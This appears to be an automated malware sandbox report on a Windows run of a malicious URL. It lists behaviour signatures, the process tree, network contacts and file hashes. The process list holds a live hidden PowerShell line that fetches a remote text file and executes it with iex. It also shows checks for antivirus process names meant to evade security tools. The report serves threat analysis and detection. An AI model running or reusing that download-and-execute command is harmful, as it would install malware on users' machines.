Analysis Overview
Threat Level: Known bad
The file http://kodekthungg.com/go/6818d61d-1f2e-4bc0-a98b-c63669acc41f was found to be: Known bad.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Enumerates processes with tasklist
Drops file in System32 directory
Browser Information Discovery
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 12:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 12:30
Reported
2024-11-13 12:31
Platform
win10v2004-20241007-en
Max time kernel
48s
Max time network
49s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://kodekthungg.com/go/6818d61d-1f2e-4bc0-a98b-c63669acc41f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc8e1646f8,0x7ffc8e164708,0x7ffc8e164718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/pioneer.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
"C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Variable Variable.cmd & Variable.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 378953
C:\Windows\SysWOW64\findstr.exe
findstr /V "dideditionindividualdig" Dans
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kodekthungg.com | udp |
| US | 52.55.41.13:80 | kodekthungg.com | tcp |
| US | 52.55.41.13:80 | kodekthungg.com | tcp |
| US | 8.8.8.8:53 | sos-at-vie-2.exo.io | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.41.55.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| AT | 138.124.210.238:443 | sos-at-vie-2.exo.io | tcp |
| US | 8.8.8.8:53 | www.cloudflare.com | udp |
| US | 104.16.123.96:443 | www.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.210.124.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.123.16.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fixedzip.oss-ap-southeast-5.aliyuncs.com | udp |
| ID | 149.129.200.56:443 | fixedzip.oss-ap-southeast-5.aliyuncs.com | tcp |
| US | 8.8.8.8:53 | 56.200.129.149.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f426165d1e5f7df1b7a3758c306cd4ae |
| SHA1 | 59ef728fbbb5c4197600f61daec48556fec651c1 |
| SHA256 | b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841 |
| SHA512 | 8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6 |
\??\pipe\LOCAL\crashpad_5024_OGTPNQYFZQZLSGDN
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6960857d16aadfa79d36df8ebbf0e423 |
| SHA1 | e1db43bd478274366621a8c6497e270d46c6ed4f |
| SHA256 | f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32 |
| SHA512 | 6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff8d025a6296e4a341964a4d4405043c |
| SHA1 | 037b37f7b630171bfa0ee205dd452f2adfb68f9b |
| SHA256 | d60d2f0467be79f4111d21759c37fd583b37e98973e2f42c45d4744dd3d689df |
| SHA512 | 5d068eb471bd7aa5f49dbd09d5bd77ba83b9d157002b981e98fc2d538f5eb8e2ffc7c13ca1bea7349db626e626bb2f16cfeaed78ce7cc2bdd4fea77c5d0d86a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ccea8542de9f574cae33610081b0ea23 |
| SHA1 | 48e2dc64b480d3288b94bf26227e9d4d195552ef |
| SHA256 | 02c35af4464aa0e7a20018dd9064d49289933a5b43555c15b3bd73ed31e61bf7 |
| SHA512 | a8cac96d74cf3b89e949b3f90fa4108b77e2d5ead9376ac2fdb577c528e1c5b2ef4c735fff9fed332db6e9ab61f520c89c14028f7e173d7aa9e709b2388b4c9d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b71c2d04aeb5c046520ae070e766d354 |
| SHA1 | 32a5f5f8ddf5c118854139893c2026e22b2f2094 |
| SHA256 | 22c2fe4302bd466575e774fabd9eafac7f489b78b98fd4cd7f89ec16e716c182 |
| SHA512 | 8383e9af5ea5d4979a72b8867c0c7d032618df48b53f28326238a44845995086e9f88a0a3201de5cf34781e8b65005034dbec80db948410896dc2a94e0df8cfa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\0b9c9b35-4a02-461b-9443-137e0afcdc59.tmp
| MD5 | e04d66387279a1e0e66a58c3ba8b5d10 |
| SHA1 | 67bab272b21834da5ae795ef2ada7e10fe6afe75 |
| SHA256 | 2808fcf390832bf0b49792f08ee025e4027f2636a06603f4b28b7bc064320e92 |
| SHA512 | 2a6fd4c7399f26b01d973eb5382728201786f07d0eed88c1b2bd6161f4e52c67490ef0dc10e9b7ded1b9225b40e8a940a686e2247600e1547ec11157169e3118 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r00jm5cx.t0q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5560-99-0x0000019945470000-0x0000019945492000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 24e67878b4334507219370c4aec2b0ce |
| SHA1 | 25e31676c99b0e9b7e3f7335f992ba8659642e87 |
| SHA256 | 049906f6d6d06c3e5fdcec75010b070fa1351a5b1130e37556b00ce17873a514 |
| SHA512 | 62b55f2007e272587f7a8dc0b9a66448d2d45e1549793faeb43561d632abf033f95c5aa8e1ea7cdbb352c194a3e47e02a2bf669a86106395ae244bb859a2f837 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 01be0162652675902199abe17c8e7ae6 |
| SHA1 | 8a4c86b84b8277d8f28b5db1837a8e68d42fe219 |
| SHA256 | 8b4bcec8a224834bb086e3c0a6b6866f64b78e24018704a97e9317daedd4e5cd |
| SHA512 | c6f81c20598e36102c86fb777ce0241c3aea4093ea954a14b6f8810ce4487dbe3209459d0f7aed758c33036514c9372191bbd2761a472c1b2577c6df1fee439f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | af56eaf62c3fa2f38c48a4ff331238a2 |
| SHA1 | 6bc5f811a4a8455f031ec1c0ba03d7b8a7c9a1e8 |
| SHA256 | 06161077f4da08fd4b41d38ded85d095616a108c748b7eed63a68c59279c0824 |
| SHA512 | fd52d97a00a100547924f6de946fc7f56a72f9a19feca2f0d0f40a4f5fada78f784e962b5dc587d07853293aa12bbe407b11abc418bb40b75a945c79d3b39230 |
memory/5560-207-0x00000199458F0000-0x00000199458FA000-memory.dmp
memory/5560-208-0x0000019945920000-0x0000019945932000-memory.dmp
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
| MD5 | e436b3a4f1a7321e8068f29bcf3940b1 |
| SHA1 | 071c1b9a732521f246645d95ad2912a19bf72224 |
| SHA256 | 09be857a377546f71794ac070a47f8441fd63160c641d1d072c11d57afc32ef0 |
| SHA512 | 41cad870441ccce5da604aa337954fa5c306d35e7a4265819bd3e94d7cb1b451e4560a5f1f3c0b1293723067a7d56b25dfef6852f96409db070df0dd4f5e359f |
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
| MD5 | 75c9f8b6ff52c1ee6e6d65f77d2c96b6 |
| SHA1 | 5da7a0ed33c144c4e6243758c4811d95c1f6ee48 |
| SHA256 | 4acf78656020852979cd57863dc7292d4978cf3d3cf70f08b216ae6a35ab822f |
| SHA512 | 2562f206aa586fb43f87366ad8232bb8490efb64d64571bcb46a6c55e87f513577c81010fada8c23d1cb9920bc432a1ab384b78c1a56808ba7579cfef06e8c86 |
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
| MD5 | 57ad22fbace6bdc2b91b4749fee45b1f |
| SHA1 | 1ac182112936fbe3cf7a2c67a6f47cf398088604 |
| SHA256 | 1a97d955f5cf9baab0ffd6d4411cef225758a1ead0ab9590cbc928f5f854942a |
| SHA512 | f69fb32c69d5cdafe555866756379990dada28fa01ef5a095d4e8aa2e9fbb38e51c6b46510a0f2f67220193b0212b985c4219029d98e9bd87d3f96dc59ee192e |
C:\Users\Admin\AppData\Local\Temp\Variable
| MD5 | d55f01f0fb018b9ba38cff9f3bd761e2 |
| SHA1 | 06b62c4ee269fc6d3270b12c66a0b24100255044 |
| SHA256 | ba0f96a1e3c5068d09e581768aa0079db3f087d6560d260e52df655b2b583f78 |
| SHA512 | bc2d30c82b882bfe54ff6662458a062af24f5e7a66281aaff679a3ff61f7a689697960946185addb0c1063c2fc11ba4b5385c5f8530ebc5bf7b66008b6d7b4dd |
C:\Users\Admin\AppData\Local\Temp\Dans
| MD5 | 904400b251be89b48ce61493053ff19c |
| SHA1 | 1075d4efa4cdd9be308a8ff2c5b3f7a33ccd6f17 |
| SHA256 | e2c9bed074ed6a4603d322c96406f0fa3094e8797be9238fffbfa4ae3fc24b01 |
| SHA512 | 1765d1a12b532eb2842804803edca08e934016e1e39286c011876a640e56cf893a751f7cca4edd846aab5be06dfe3c9eecf39b8fdecf03bdf16ef50635124681 |
C:\Users\Admin\AppData\Local\Temp\Fighting
| MD5 | 80f09bf6206864e0aa01f873f01500fb |
| SHA1 | 69f399b9a23d7c52ebaf121688594e4e310d13f0 |
| SHA256 | 695708ccf96c149faceb5566d9f07f3bd5e3477c1fd3e3f381654f8f527ad1ce |
| SHA512 | e7e74905c3ff4669e74cd05d4173cabab1916158ba34d2c4d2660f3156716b7c1973cebff9b3efae3fe1c9700e5cd5e51dd1f6fdf3f4a5b0470d5fd2d2aad2cf |